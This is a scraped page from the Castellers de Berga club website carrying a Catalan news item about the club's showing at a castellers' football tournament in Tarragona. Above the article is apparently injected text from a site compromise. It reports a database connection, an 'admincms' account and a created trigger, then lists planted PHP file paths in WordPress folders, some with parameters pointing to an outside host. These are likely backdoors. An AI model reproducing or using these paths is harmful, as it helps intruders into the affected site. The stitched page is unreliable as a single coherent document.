Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax-response https://castellersdeberga.cat/wp-admin/network/sites-ajax-meta-ajax-response-private-meta-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/moderation-private-ajax-response-private-ajax-response-wp.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/async-upload-meta-stream-stream.php https://castellersdeberga.cat/wp-content/plugins/the-events-calendar/the-events-calendar-meta-stream-stream-core-wp-wp-cron-cron.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-ajax-response-meta-cron-private-ajax-stream-meta-ajax-response-ajax-response.php https://castellersdeberga.cat/wp-includes/customize/class-wp-widget-form-customize-control-private-private-core-meta-cron-stream.php https://castellersdeberga.cat/wp-includes/block-supports/duotone-cron-ajax-core.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Futbol i bon amient casteller a Tarragona
 

Futbol i bon amient casteller a Tarragona


Futbol i bon amient casteller a TarragonaAvui diumenge 28 de febrer, al migdia, ha finaltitzat el 15è Torneig Casteller de Futbol. Dels 32 equips de diverses colles castelleres, els Castellers de Vilafranca i la Colla Vella dels Xiquets de Valls han arribat a la final. S’han imposat els verds per 2 a 1.
Els Castellers de Berga ens hem classificat en la 17a posició, amb un total de 7 partits jugats: 4 victòries, 1 empat i 2 derrotes. En la fase incial de grups, vam perdre amb els Moixiganguers d’Igualada i la Colla Jove Xiquets de Tarragona i vam empatar amb els padrins Castellers de Sabadell. Una vegada eliminats de la 1a fase, hem continuat els partits per la classificació entre la 17a i la 32a posició. A partir del 4t partit, els hem guanyat tots. El futbol es así, no hay rival fácil i el públic sempre té la raó.
Estem molt contents de la nostra 3a participació al Torneig Casteller de Futbol pel bon ambient viscut. Ja havíem participat a l’edició de Salt i a la de Terrassa. I volem felicitar als organitzadors, la Colla Jove Xiquets de Tarragona. Això de fer rutllar 1500 persones no és feina fàcil.